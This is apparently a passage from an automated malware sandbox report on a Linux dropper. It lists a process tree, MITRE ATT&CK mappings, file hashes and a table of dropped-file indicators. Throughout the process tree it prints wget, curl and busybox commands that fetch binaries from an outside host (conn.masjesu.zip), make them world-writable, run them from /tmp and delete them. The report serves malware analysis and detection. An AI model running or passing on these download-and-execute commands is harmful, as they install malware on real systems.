  wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
  PID:950
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:951
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
  PID:953
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:954
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:956
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:957
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:958
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:960
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:967
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:970
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:971
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:974
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:976
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:977
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:978
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:979
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - System Network Configuration Discovery
  PID:981
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:984
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - System Network Configuration Discovery
  PID:985
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:986
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - System Network Configuration Discovery
  PID:988
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:990
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:991
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:992
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:993
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:995
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:997
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:998
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - System Network Configuration Discovery
  PID:999
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1000
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - System Network Configuration Discovery
  PID:1002
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:1003
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:1004
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1005
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - System Network Configuration Discovery
  PID:1006
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1007
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - System Network Configuration Discovery
  PID:1009
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:1010
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:1011
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	744	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	765	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	803	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	810	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	847	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	854	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	861	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	871	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	878	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	885	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	892	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	899	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	906	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	913	GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	920	GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	927	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	934	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	941	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	948	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	955	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	962	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	969	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	976	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	983	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	990	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	997	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	1004	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	1011	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO